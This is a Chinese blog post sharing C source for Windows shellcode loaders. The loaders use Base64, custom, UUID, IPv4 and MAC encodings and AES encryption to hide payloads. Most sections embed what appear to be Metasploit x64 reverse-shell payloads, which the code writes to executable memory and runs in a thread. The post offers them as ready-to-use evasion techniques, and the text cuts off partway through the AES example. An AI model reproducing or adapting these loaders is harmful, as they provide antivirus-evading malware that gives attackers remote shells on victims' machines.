一组shellcode加密方式(附源码)

admin 2023年3月1日11:42:06评论76 views字数 28498阅读94分59秒阅读模式
写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞这个包含:简单的 shellcode 加载器,编码器(base64 - 自定义 - UUID - IPv4 - MAC),加密器(AES),无文件加载器(Winhttp,Sockets)。截图如下:

一组shellcode加密方式(附源码)

一组shellcode加密方式(附源码)

一组shellcode加密方式(附源码)

不多说,上代码。
1、简单加载

#include <Windows.h>#include <stdio.h>int main() {// use payload/windows/x64/shell_reverse_tcp// generate -f c unsigned char payload[] ="xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52""x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48""x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9""x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41""x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48""x01xd0x8bx80x88x00x00x00x48x85xc0x74x67x48x01""xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48""xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0""xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4c""x24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0""x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04""x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59""x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48""x8bx12xe9x57xffxffxffx5dx48xbax01x00x00x00x00""x00x00x00x48x8dx8dx01x01x00x00x41xbax31x8bx6f""x87xffxd5xbbxe0x1dx2ax0ax41xbaxa6x95xbdx9dxff""xd5x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb""x47x13x72x6fx6ax00x59x41x89xdaxffxd5x63x61x6c""x63x2ex65x78x65x00";LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to Allocate memory (%u)n", GetLastError());return -1;}  MoveMemory(alloc_mem, payload, sizeof(payload));//RtlMoveMemory(alloc_mem, payload, sizeof(payload));DWORD oldProtect;if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {printf("Failed to change memory protection (%u)n", GetLastError());return -2;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to Create the thread (%u)n", GetLastError());return -3;}printf("nnalloc_mem : %pn", alloc_mem);WaitForSingleObject(tHandle, INFINITE);getchar();return 0;}

2、Encoding:
2-1、Base64 Loading

#include <windows.h>#include <stdio.h>#pragma comment (lib, "Crypt32.lib")int main(void) {    // calc    //const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";    // reverse shell    const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATSZFuwDUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvgHSoKQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==";    DWORD payloadLen = sizeof(payload);    LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);    if (!alloc_mem) {        printf("Failed to allocate memory (%u)n", GetLastError());        return -1;    }     // base64 decoding    if (!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen, NULL, NULL)) {        printf("Failed to decode the payload(%u)n", GetLastError());        return -2;    }    DWORD OldProtect;    if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {        printf("Failed to change memory protection (%u)n", GetLastError());        return -3;    }    ((void(*)())alloc_mem)();    return 0;}

2-2、Custom Encoding:

#include <Windows.h>#include <stdio.h>// calc//unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };// reverse shellunsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4b, 0xbf, 0x79, 0x74, 0x34, 0x60, 0x35, 0x33, 0x2, 0x1, 0x43, 0x57, 0x4b, 0x8a, 0xe8, 0x49, 0x83, 0xed, 0xa2, 0x2, 0x2, 0x1, 0x4b, 0x8a, 0xe7, 0x4a, 0xbe, 0x3, 0x2, 0x5, 0xd4, 0x65, 0x5d, 0xb1, 0xf, 0x42, 0x56, 0x4a, 0x8b, 0xe5, 0x4e, 0x8a, 0xf3, 0x42, 0xbc, 0x4d, 0x79, 0x27, 0x9, 0x100, 0xd7, 0x4d, 0x8b, 0xeb, 0x6a, 0x2, 0x3, 0x1, 0x2, 0x5a, 0x43, 0xbb, 0x2b, 0x81, 0x6d, 0x1, 0x101, 0xd6, 0x52, 0x51, 0x4f, 0x32, 0xcb, 0x4e, 0x33, 0xc1, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc3, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc2, 0x43, 0xbb, 0xec, 0x10, 0xe1, 0xe1, 0x101, 0xd6, 0x4a, 0x8a, 0xc9, 0x6b, 0x12, 0x42, 0x5a, 0x4d, 0x8b, 0xe3, 0x4a, 0x8a, 0xfb, 0x42, 0xbc, 0x9a, 0xa7, 0x75, 0x63, 0x100, 0xd7, 0x49, 0x83, 0xc5, 0x42, 0x3, 0x2, 0x1, 0x4b, 0xb9, 0x65, 0x6e, 0x66, 0x1, 0x2, 0x1, 0x2, 0x1, 0x43, 0x51, 0x43, 0x51, 0x4a, 0x8a, 0xe4, 0x58, 0x59, 0x58, 0x4f, 0x32, 0xc2, 0x6b, 0xf, 0x5a, 0x43, 0x51, 0xe4, 0xfd, 0x68, 0xc8, 0x46, 0x25, 0x56, 0x2, 0x3, 0x49, 0x8f, 0x45, 0x26, 0x19, 0xc8, 0x1, 0x6a, 0x49, 0x8b, 0xe7, 0x58, 0x51, 0x43, 0x51, 0x43, 0x51, 0x43, 0x51, 0x4b, 0x100, 0xc2, 0x42, 0x52, 0x4a, 0x101, 0xc9, 0x4f, 0x8a, 0xc3, 0x4d, 0x8b, 0xc2, 0x43, 0xbb, 0x7b, 0xcd, 0x41, 0x87, 0x101, 0xd6, 0x4a, 0x32, 0xd4, 0x49, 0x101, 0xcb, 0x8d, 0xf, 0x43, 0xbb, 0xa, 0x88, 0x1f, 0x61, 0x101, 0xd6, 0xbd, 0xe1, 0x1f, 0x2b, 0xc, 0x42, 0xbc, 0xa7, 0x97, 0xbe, 0x9f, 0x100, 0xd7, 0x49, 0x85, 0xc5, 0x2a, 0x3d, 0x8, 0x7d, 0xc, 0x81, 0xfd, 0xe1, 0x77, 0x6, 0xbd, 0x48, 0x15, 0x73, 0x71, 0x6b, 0x2, 0x5a, 0x43, 0x8a, 0xdc, 0x100, 0xd7 };DWORD payloadLen = sizeof(payload);void Decode(unsigned char* payload) {for (int i = 0; i < payloadLen; i++) {if (i % 2 == 0) {payload[i]--;}else {payload[i] -= 2;}}}int main() {LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!alloc_mem) {printf("Failed to Allocate memory (%u)n", GetLastError());return -1;}Decode(payload);CopyMemory(alloc_mem, payload, payloadLen);DWORD OldProtect;if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {printf("Failed to Change memory protection (%u)n", GetLastError());return -2;}HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);if (!tHandle) {printf("Failed to create the Thread (%u)n", GetLastError());return -3;}WaitForSingleObject(tHandle, INFINITE);return 0;}

2-3、UUID shellcode:

// Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the technique#include <Windows.h>#include <stdio.h>#include <Rpc.h>#pragma comment(lib, "Rpcrt4.lib")int main() {     const char* uuids[] = {        "e48348fc-e8f0-00c0-0000-415141505251",        "d2314856-4865-528b-6048-8b5218488b52",        "728b4820-4850-b70f-4a4a-4d31c94831c0",        "7c613cac-2c02-4120-c1c9-0d4101c1e2ed",        "48514152-528b-8b20-423c-4801d08b8088",        "48000000-c085-6774-4801-d0508b481844",        "4920408b-d001-56e3-48ff-c9418b348848",        "314dd601-48c9-c031-ac41-c1c90d4101c1",        "f175e038-034c-244c-0845-39d175d85844",        "4924408b-d001-4166-8b0c-48448b401c49",        "8b41d001-8804-0148-d041-5841585e595a",        "59415841-5a41-8348-ec20-4152ffe05841",        "8b485a59-e912-ff57-ffff-5d49be777332",        "0032335f-4100-4956-89e6-4881eca00100",        "e5894900-bc49-0002-04d2-645bb00d4154",        "4ce48949-f189-ba41-4c77-2607ffd54c89",        "010168ea-0000-4159-ba29-806b00ffd550",        "c9314d50-314d-48c0-ffc0-4889c248ffc0",        "41c18948-eaba-df0f-e0ff-d54889c76a10",        "894c5841-48e2-f989-41ba-99a57461ffd5",        "40c48148-0002-4900-b863-6d6400000000",        "41504100-4850-e289-5757-574d31c06a0d",        "e2504159-66fc-44c7-2454-0101488d4424",        "6800c618-8948-56e6-5041-504150415049",        "5041c0ff-ff49-4dc8-89c1-4c89c141ba79",        "ff863fcc-48d5-d231-48ff-ca8b0e41ba08",        "ff601d87-bbd5-1de0-2a0a-41baa695bd9d",        "8348d5ff-28c4-063c-7c0a-80fbe07505bb",        "6f721347-006a-4159-89da-ffd590909090"    };

    HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);    void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);    DWORD_PTR ptr = (DWORD_PTR)alloc_mem;    int init = sizeof(uuids) / sizeof(uuids[0]);

    for (int i = 0; i < init; i++) {        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);        if (status != RPC_S_OK) {            printf("UuidFromStringA != RPC_S_OKn");            CloseHandle(alloc_mem);            return -1;        }        ptr += 16;    }    EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem, 0);    return 0; }

2-4、IPv4 shellcode:

#include <Windows.h>#include <stdio.h>#include <Ip2string.h>#pragma comment(lib, "Ntdll.lib")#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif

int main() {    const char* IPv4s[] =    {        "252.72.131.228",        "240.232.192.0",        "0.0.65.81",        "65.80.82.81",        "86.72.49.210",        "101.72.139.82",        "96.72.139.82",        "24.72.139.82",        "32.72.139.114",        "80.72.15.183",        "74.74.77.49",        "201.72.49.192",        "172.60.97.124",        "2.44.32.65",        "193.201.13.65",        "1.193.226.237",        "82.65.81.72",        "139.82.32.139",        "66.60.72.1",        "208.139.128.136",        "0.0.0.72",        "133.192.116.103",        "72.1.208.80",        "139.72.24.68",        "139.64.32.73",        "1.208.227.86",        "72.255.201.65",        "139.52.136.72",        "1.214.77.49",        "201.72.49.192",        "172.65.193.201",        "13.65.1.193",        "56.224.117.241",        "76.3.76.36",        "8.69.57.209",        "117.216.88.68",        "139.64.36.73",        "1.208.102.65",        "139.12.72.68",        "139.64.28.73",        "1.208.65.139",        "4.136.72.1",        "208.65.88.65",        "88.94.89.90",        "65.88.65.89",        "65.90.72.131",        "236.32.65.82",        "255.224.88.65",        "89.90.72.139",        "18.233.87.255",        "255.255.93.73",        "190.119.115.50",        "95.51.50.0",        "0.65.86.73",        "137.230.72.129",        "236.160.1.0",        "0.73.137.229",        "73.188.2.0",        "4.210.100.91",        "176.26.65.84",        "73.137.228.76",        "137.241.65.186",        "76.119.38.7",        "255.213.76.137",        "234.104.1.1",        "0.0.89.65",        "186.41.128.107",        "0.255.213.80",        "80.77.49.201",        "77.49.192.72",        "255.192.72.137",        "194.72.255.192",        "72.137.193.65",        "186.234.15.223",        "224.255.213.72",        "137.199.106.16",        "65.88.76.137",        "226.72.137.249",        "65.186.153.165",        "116.97.255.213",        "72.129.196.64",        "2.0.0.73",        "184.99.109.100",        "0.0.0.0",        "0.65.80.65",        "80.72.137.226",        "87.87.87.77",        "49.192.106.13",        "89.65.80.226",        "252.102.199.68",        "36.84.1.1",        "72.141.68.36",        "24.198.0.104",        "72.137.230.86",        "80.65.80.65",        "80.65.80.73",        "255.192.65.80",        "73.255.200.77",        "137.193.76.137",        "193.65.186.121",        "204.63.134.255",        "213.72.49.210",        "72.255.202.139",        "14.65.186.8",        "135.29.96.255",        "213.187.224.29",        "42.10.65.186",        "166.149.189.157",        "255.213.72.131",        "196.40.60.6",        "124.10.128.251",        "224.117.5.187",        "71.19.114.111",        "106.0.89.65",        "137.218.255.213",    };  PCSTR Terminator = NULL;PVOID LpBaseAddress = NULL;PVOID LpBaseAddress2 = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);    if (!hHeap) {        printf("Failed to create a heap (%u)n", GetLastError());        return -1;    }void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);    if (!alloc_mem) {        printf("Failed to allocate memory on the heap (%u)n", GetLastError());        return -2;    }DWORD_PTR ptr = (DWORD_PTR)alloc_mem;int init = sizeof(IPv4s) / sizeof(IPv4s[0]);for (int i = 0; i < init; i++) {RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());return FALSE;}ptr += 4;}    HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);    if (!tHandle) {        printf("Failed to Create the thread (%u)n", GetLastError());        return -3;    }    WaitForSingleObject(tHandle, INFINITE);    return 0;}

2-5、MAC shellcode:

#include <Windows.h>#include <stdio.h>#include <Ip2string.h>#pragma comment(lib, "Ntdll.lib")

#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif#define _CRT_SECURE_NO_WARNINGS#pragma warning(disable:4996)#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")int Error(const char* msg) {printf("%s (%u)", msg, GetLastError());return 1;}int main() {    const char* MAC[] =    {        "90-90-90-90-90-90",        "90-90-90-90-90-90",        "90-90-90-90-90-90",        "90-90-90-90-90-90",        "90-90-90-90-90-90",        "90-90-90-90-90-90",        "90-90-90-90-90-90"    };  int rowLen = sizeof(MAC) / sizeof(MAC[0]);PCSTR Terminator = NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);DWORD_PTR ptr = (DWORD_PTR)alloc_mem;for (int i = 0; i < rowLen; i++) {STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);if (!NT_SUCCESS(STATUS)) {printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());return FALSE;}ptr += 6;}    HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);    if (!tHandle) {        printf("Failed to Create the thread (%u)n", GetLastError());        return -3;    }    WaitForSingleObject(tHandle, INFINITE);        printf("alloc_memn", alloc_mem);    getchar();    return 0;}

3、Encrypting:
3-1、AES:

#include <Windows.h>#include <stdio.h>#include <wincrypt.h>#pragma comment (lib, "crypt32.lib")#pragma comment(lib, "ntdll")#define NtCurrentProcess()   ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory(    HANDLE    ProcessHandle,    PVOID* BaseAddress,    ULONG_PTR ZeroBits,    PSIZE_T   RegionSize,    ULONG     AllocationType,    ULONG     Protect);

EXTERN_C NTSTATUS NtProtectVirtualMemory(    IN HANDLE ProcessHandle,    IN OUT PVOID* BaseAddress,    IN OUT PSIZE_T RegionSize,    IN ULONG NewProtect,    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(    OUT PHANDLE hThread,    IN ACCESS_MASK DesiredAccess,    IN PVOID ObjectAttributes,    IN HANDLE ProcessHandle,    IN PVOID lpStartAddress,    IN PVOID lpParameter,    IN ULONG Flags,    IN SIZE_T StackZeroBits,    IN SIZE_T SizeOfStackCommit,    IN SIZE_T SizeOfStackReserve,    OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(    IN HANDLE         Handle,    IN BOOLEAN        Alertable,    IN PLARGE_INTEGER Timeout);void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {    HCRYPTPROV hProv;    HCRYPTHASH hHash;    HCRYPTKEY hKey;    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {        printf("Failed in CryptAcquireContextW (%u)n", GetLastError());        return;    }    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {        printf("Failed in CryptCreateHash (%u)n", GetLastError());        return;    }    if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {        printf("Failed in CryptHashData (%u)n", GetLastError());        return;    }    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {        printf("Failed in CryptDeriveKey (%u)n", GetLastError());        return;    }    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) {        printf("Failed in CryptDecrypt (%u)n", GetLastError());        return;    }    CryptReleaseContext(hProv, 0);    CryptDestroyHash(hHash);    CryptDestroyKey(hKey);}int main(int argc, char** argv) {char AESkey[] = { 0x64, 0xb5, 0x31, 0xfe, 0xb3, 0x6b, 0xb3, 0x8c, 0x88, 0x6a, 0x4c, 0x38, 0xc, 0xcb, 0x19, 0x4a };    unsigned char AESshellcode[] = { 0x8, 0x21, 0x22, 0xeb, 0xfa, 0xdb, 0x42, 0x9, 0x8e, 0x24, 0xb6, 0x10, 0xfb, 0x93, 0x5b, 0xfe, 0xc3, 0x9d, 0x75, 0x68, 0xcc, 0x35, 0xd0, 0xef, 0xfd, 0x23, 0x70, 0xe3, 0x1, 0x3d, 0x8f, 0xd0, 0xe6, 0x5b, 0x97, 0x5e, 0x79, 0x78, 0x55, 0xf9, 0xaf, 0x71, 0x67, 0x78, 0x3c, 0xd9, 0x4a, 0xe7, 0x81, 0xc, 0xe5, 0x50, 0x46, 0x47, 0xa, 0x2e, 0x79, 0x5b, 0x6f, 0x43, 0x4d, 0x10, 0x2d, 0x35, 0x93, 0x94, 0xdd, 0x8f, 0x36, 0x2d, 0x3, 0xed, 0x9, 0x33, 0xed, 0xe3, 0xe1, 0x43, 0x17, 0xb6, 0xff, 0xe9, 0x69, 0x33, 0x1c, 0x81, 0x83, 0xb, 0xbf, 0x13, 0x1c, 0x25, 0xd5, 0x2f, 0xb8, 0x90, 0x6d, 0x1e, 0xd3, 0x11, 0xd, 0x29, 0xf7, 0x13, 0xde, 0x7e, 0x71, 0x53, 0x7, 0x44, 0xf3, 0xf6, 0xf6, 0xc3, 0x54, 0xb3, 0xaa, 0xe1, 0xd6, 0xbf, 0x1e, 0xa, 0x9c, 0x25, 0x72, 0x9e, 0x8b, 0x54, 0x62, 0x1c, 0xd9, 0x72, 0xab, 0xbd, 0x30, 0x47, 0x65, 0xd2, 0x0, 0x45, 0xb, 0xc4, 0x16, 0xbb, 0x80, 0xf, 0xd4, 0x0, 0x22, 0x40, 0xd3, 0x4d, 0xbb, 0x3f, 0x64, 0xe1, 0xa8, 0x2a, 0x60, 0x1e, 0xd1, 0x0, 0xd9, 0xb3, 0x46, 0xb6, 0x1c, 0xd0, 0xe2, 0xe1, 0x7d, 0x99, 0x9f, 0x8a, 0x70, 0xd5, 0x7d, 0x9c, 0x88, 0xd, 0x2d, 0xbb, 0x4c, 0x2a, 0x3f, 0xeb, 0xfd, 0xdd, 0xad, 0x8f, 0xba, 0xcc, 0x87, 0x3, 0xcf, 0x8f, 0x15, 0x54, 0xc5, 0xc1, 0xa2, 0xcb, 0x9b, 0x14, 0xae, 0xcb, 0x8, 0xf, 0x5a, 0xae, 0x6d, 0x63, 0xf3, 0x82, 0xe2, 0xec, 0x79, 0xe0, 0x1c, 0xb1, 0x85, 0xa9, 0x22, 0xb0, 0x66, 0xe9, 0x73, 0xbe, 0xdc, 0xac, 0xdc, 0x7d, 0x2e, 0xac, 0x5d, 0x29, 0x23, 0x44, 0x11, 0xee, 0xbf, 0xc9, 0x60, 0xa2, 0x1e, 0x7, 0x6d, 0x9e, 0x56, 0xf2, 0xb4, 0x2a, 0xb6, 0x83, 0x4, 0xca, 0x7e, 0xcb, 0x7e, 0x63, 0x8a, 0x70, 0xa1, 0xe5, 0x1f, 0x6f, 0xa, 0x21, 0x2e, 0x5b, 0x4c, 0x6a, 0x62, 0x84, 0x70, 0x33, 0x84, 0xca, 0x48, 0x39, 0x6b, 0x64, 0xc6, 0x4, 0xc6, 0x6f, 0xe2, 0x6d, 0x29, 0xda, 0x78, 0x64, 0x59, 0x13, 0xfe, 0x2, 0x3, 0xd9, 0xe, 0x7e, 0x97, 0x10, 0x7c, 0xbd, 0x9a, 0xf1, 0xbf, 0xce, 0x4e, 0x4, 0xf1, 0x93, 0x25, 0x88, 0x52, 0x99, 0x44, 0xbd, 0x52, 0x7c, 0xfe, 0x2c, 0xdb, 0x50, 0x9, 0x3b, 0x2a, 0xd, 0x30, 0x73, 0x3c, 0x8c, 0xee, 0xec, 0xb8, 0xc8, 0xe3, 0x3d, 0x48, 0xed, 0xc0, 0x4b, 0xd1, 0x8d, 0x48, 0x0, 0x3, 0xd8, 0xc, 0xde, 0x69, 0xf9, 0xe, 0xda, 0x31, 0xfe, 0xb6, 0x77, 0xc4, 0x4d, 0x31, 0x25, 0xc5, 0xd1, 0xa1, 0x11, 0x22, 0x15, 0x8, 0xc7, 0xa5, 0x73, 0x19, 0x3a, 0x87, 0x5, 0xcc, 0x37, 0x34, 0xad, 0x8a, 0xfa, 0xae, 0x6b, 0xf8, 0x38, 0x4a, 0x5, 0x2e, 0x74, 0xda, 0x77, 0x2a, 0xa0, 0x4f, 0xab, 0xcd, 0xbb, 0x2e, 0x2f, 0xb8, 0xf7, 0xa1, 0x91, 0x8e, 0x42, 0x43, 0x85, 0xa, 0x6b, 0xfd, 0x6d, 0x37, 0xd8, 0xa, 0x53, 0x9f, 0x54, 0x49, 0x26, 0x2a, 0x6d, 0x9e, 0x85, 0x30, 0xe5, 0xc7, 0x91, 0x80, 0x75, 0x79, 0xc1, 0x2a, 0x87, 0xc9, 0xd0, 0x47, 0xdd, 0xc3, 0x9f, 0x66, 0xf0, 0x23, 0xf1, 0xa2, 0x4, 0x7e, 0xf1, 0xd7, 0x28, 0x1d, 0x3b, 0xcd, 0x2, 0x7, 